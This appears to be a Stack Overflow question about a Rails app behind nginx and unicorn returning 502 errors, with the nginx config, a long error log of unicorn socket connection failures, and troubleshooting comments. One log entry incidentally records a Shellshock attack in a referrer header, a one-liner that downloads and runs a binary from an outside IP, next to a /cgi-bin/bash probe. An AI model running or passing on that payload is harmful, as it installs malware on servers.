# 502 (Bad Gateway)

Tags: ruby-on-rails, ruby, ruby-on-rails-4, unicorn

After deploying my rails app successfully, I got a 502 (Bad Gateway) when I visited the ip.

When I run

```
rails s -e production
```

The app works fine locally on production environment. And when I check my **production.log** I don't find any warning or errors. I'm lost on how I can track down the source of the problem.

I'm using: ubuntu, nginx, capistrano, & unicorn.

**nginx.conf**

```
upstream unicorn {
  server unix:/tmp/unicorn.mysite.sock fail_timeout=0;
}

server {
  server_name dima;
  return 301 $scheme://mysite$request_uri;
}

server {
  listen 80 default deferred;
  server_name dima;  
  root /var/www/mysite/current/public; 

 location ^~ /assets/ {
    gzip_static on;
    expires max;
    add_header Cache-Control public;
  }

  try_files $uri/index.html $uri @unicorn;
  location @unicorn {
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_set_header Host $http_host;
    proxy_redirect off;
    proxy_pass http://unicorn;
  }

  error_page 500 502 503 504 /500.html;
  keepalive_timeout 10;
}
```

**nginx's error.log**

```
2015/05/12 14:06:52 [crit] 15290#0: *179 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET /en HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/en", host: “*.*.*.*"

2015/05/12 14:08:31 [crit] 15290#0: *183 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET /en HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/en", host: “*.*.*.*"

2015/05/12 14:09:21 [crit] 15290#0: *186 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET /en HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/en", host: “*.*.*.*"

2015/05/12 14:09:25 [crit] 15290#0: *186 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET /ar HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/ar", host: “*.*.*.*"

2015/05/12 14:09:28 [crit] 15290#0: *186 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET / HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/", host: “*.*.*.*"

2015/05/12 14:12:47 [crit] 15290#0: *191 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET / HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/", host: “*.*.*.*"

2015/05/12 14:12:58 [crit] 15290#0: *193 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET / HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/", host: “*.*.*.*"

2015/05/12 14:12:59 [crit] 15290#0: *193 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET /en HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/en", host: “*.*.*.*"

2015/05/12 14:13:05 [crit] 15290#0: *193 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET /ar HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/ar", host: “*.*.*.*"

2015/05/12 14:13:05 [crit] 15290#0: *196 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET /ar HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/ar", host: “*.*.*.*"

2015/05/12 14:13:30 [crit] 15290#0: *199 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET /ar HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/ar", host: “*.*.*.*"

2015/05/12 14:13:32 [crit] 15290#0: *199 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET /ar HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/ar", host: “*.*.*.*"

2015/05/12 14:14:15 [crit] 15290#0: *203 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET /ar HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/ar", host: “*.*.*.*"

2015/05/12 14:14:27 [crit] 15290#0: *206 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET /ar HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/ar", host: “*.*.*.*"

2015/05/12 14:15:22 [crit] 15290#0: *209 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET /ar HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/ar", host: “*.*.*.*"

2015/05/12 14:15:23 [crit] 15290#0: *209 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET /ar HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/ar", host: “*.*.*.*"

2015/05/12 14:15:29 [crit] 15290#0: *209 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET /en HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/en", host: “*.*.*.*"

2015/05/12 14:15:30 [crit] 15290#0: *209 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET /en HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/en", host: “*.*.*.*"

2015/05/12 14:15:32 [crit] 15290#0: *209 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET / HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/", host: “*.*.*.*"

2015/05/12 14:31:11 [crit] 15290#0: *216 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET / HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/", host: “*.*.*.*"

2015/05/12 14:44:59 [crit] 15290#0: *218 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET / HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/", host: “*.*.*.*"

2015/05/12 15:07:03 [crit] 15290#0: *221 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET /cgi-bin/bash HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/cgi-bin/bash", host: “*.*.*.*"

2015/05/12 15:43:44 [crit] 15290#0: *223 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET / HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/", host: "*.*.*.*", referrer: "() { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://182.92.184.208:8806/zou1 -O /tmp/China.Z-qmpz >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-qmpz >> /tmp/Run.sh;echo /tmp/China.Z-qmpz >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh”"

2015/05/12 16:10:04 [crit] 15290#0: *225 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET /en HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/en", host: “*.*.*.*"

2015/05/12 16:35:10 [crit] 15290#0: *229 connect() to unix:/tmp/unicorn.testapp.sock failed (2: No such file or directory) while connecting to upstream, client: *.*.*.*, server: mysite, request: "GET /en HTTP/1.1", upstream: "http://unix:/tmp/unicorn.testapp.sock:/en", host: "*.*.*.*"
```

I'm confused, why is the name of it is *'unicorn.testapp.sock'*. I checked the init script for unicorn in /etc/init.d/ and it's: unicorn_mysite. And under /tmp I have unicorn.mysite.sock

Thank you.

Comment: How do you run the application in production? Do you use nginx or apache with passenger? Or do you just use `rails s -e production` on the server? Does the app run on port 80 or on port 3000?

Comment: @zwippie edited. no I'm using 'rails s -e production' locally. When I'm running it locally i use port 3000.

Comment: Then there is probably something wrong in your nginx configuration. Can you post your configuration?

Comment: Any errors in your unicorn log?

Comment: @snkashis no. all of it info.

Comment: Are you sure the Rails processes are running? Usually 502 means it can't connect through the defined socket. Also test that `/tmp/unicorn.mysite.sock` exists.

Comment: Any possibility of seeing more detailed logs from nginx's error.log?

Comment: @tadman I checked and `unicorn.mysite.sock` exists.

Comment: That error suggests it's not there, so that's confusing.

Comment: ngnix restart might have failed. Can you run `nginx -c /etc/nginx/nginx.conf -t` and see if there are any error with your configuration.